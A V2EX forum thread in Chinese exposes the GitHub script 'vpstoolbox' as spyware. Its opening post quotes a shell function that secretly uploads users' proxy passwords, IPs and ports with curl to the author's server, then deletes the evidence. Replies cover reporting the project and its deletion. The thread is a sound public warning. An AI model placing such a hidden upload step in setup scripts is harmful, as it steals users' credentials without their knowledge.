Github 间谍项目 vpstoolbox，避雷，有用的小伙伴记得改密码

2023-03-30 10:35:45 +08:00

proxytoworld

仓库:https://github.com/johnrosen1/vpstoolbox/blob/master/vps.sh

会把机场的 IP ，端口，密码上传到作者可控的服务器，后续想干嘛就不知道了

https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494

clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}

17472 次点击

所在节点

VPS

86 条回复

buyan3303

2023-03-30 10:37:12 +08:00

[机场的 IP ，端口，密码上传到作者可控的服务器]
通常自己免费使用这些机场

proxytoworld

2023-03-30 10:39:06 +08:00

@buyan3303 也有可能转卖，谁知道呢

Greenm

2023-03-30 11:02:38 +08:00

不管出于什么目的，我已经提交 report 给 github 了。

vsitebon

2023-03-30 11:19:02 +08:00

太特么溜了

Andim

2023-03-30 11:37:50 +08:00

还是 1000 以上的关注项目呀

arfaWong

2023-03-30 11:39:45 +08:00

之前就有人发现发了 issue ，然后作者把 issue 给关了😂

jomalonejia

2023-03-30 11:47:13 +08:00

关注后续

csrocks

2023-03-30 11:48:38 +08:00

已经删库了😂

aogg

2023-03-30 11:49:06 +08:00

已经打不开 github 项目了

lzgshsj

2023-03-30 11:49:36 +08:00

不开 issue 的的仓库，多少有点这那毛病

Rache1

2023-03-30 11:53:42 +08:00

还有 1.4k 的 star

https://web.archive.org/web/20230330025849/https://github.com/johnrosen1/vpstoolbox

Rache1

2023-03-30 11:55:32 +08:00

在这个 issue 发出来的时候，还有 1.6k star 😄

为什么 trojan 订阅地址包括用户密码等要上传到个人博客？ · Issue #138 · johnrosen1/vpstoolbox · GitHub
https://web.archive.org/web/20221128070511/https://github.com/johnrosen1/vpstoolbox/issues/138

vsitebon

2023-03-30 11:56:00 +08:00

已经删号和删库了

iyiluo

2023-03-30 11:56:22 +08:00

跑路了，估计好一大波肉鸡

lakehylia

2023-03-30 11:56:48 +08:00

这是真正的删库跑路吧。。。

vsitebon

2023-03-30 11:59:13 +08:00

该开发者在 v 站： https://www.v2ex.com/member/johnrosen1

leaflxh

2023-03-30 12:00:49 +08:00

曾经有一次把 get.docker.com 记错了，打成了 get-docker.sh 。用一键脚本感觉像是在裸奔

leaflxh

2023-03-30 12:02:15 +08:00

#!/bin/bash
while [ 1 ]
do
echo " ______________ ______ ___ ________ "
echo " .\\\\ _ _ /----/ /_____/ \\\\\\. /_ "
echo " )__/ /___\\ _/ // / // /___(__ "
echo " / // \\ // / // /_\\ \\ "
echo " /_____\\ /_____\\ _________\\ _______ \\ "
echo " ////////\\_____///////\\\\/////////\\\\///////\\_____//. "
echo " _________ ___________ ________ _______ ________ "
echo " _) /_.) ._ // ___ // /_____\\____ ( "
echo " \\ |__/ \\__ |/ _// / / / X0 / \\ "
echo " \\ : / / \\__ / //_ /\\ /. / \\ "
echo " .\\\\___ /___\\ /_____////____/\\ \\\\__ / "
echo " ////\\____//////\\____/////// ////////\\____////\\____//. "
echo " ///// ///// ///// ///// "
echo ""
echo " WHY YOU NO LOOK AT THE SOURCE BEFORE YOU PIPE INTO BASH??"
echo ""
echo " #AirGap2020 Virtual Conference May 2nd! https://airgapp.in"
echo " Follow @airgappin on Twitter for updates!"
echo ""
done

cookcode

2023-03-30 12:19:59 +08:00

看了一眼，开发这个的老哥在 v2 也宣传过

wdv2ly

2023-03-30 12:20:11 +08:00

@vsitebon 哈哈，估计作者一看到 v 站小伙伴曝光，立马删库跑路😂

第 1 页／共 5 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/928400

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.